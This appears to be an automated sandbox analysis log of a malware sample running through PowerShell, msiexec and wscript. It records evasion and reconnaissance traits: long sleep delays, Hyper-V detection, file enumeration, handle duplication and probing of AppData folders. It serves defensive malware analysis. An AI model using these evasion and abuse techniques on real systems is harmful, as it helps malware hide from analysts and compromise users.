                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4390Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5502Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5898Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3832Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.3 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7684Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 8060Thread sleep time: -119000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 8064Thread sleep time: -7554000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 8064Thread sleep time: -20976000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407EF8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407898
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00418981 memset,GetSystemInfo,15_2_00418981
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: msiexec.exe, 00000008.00000003.2763354092.0000000008A01000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735060631.0000000008A01000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723001197.0000000008A01000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2743559628.0000000008A01000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A01000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735060631.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723001197.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715933734.0000000008A01000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2743559628.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2763354092.0000000008A37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: bhv6BC6.tmp.15.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
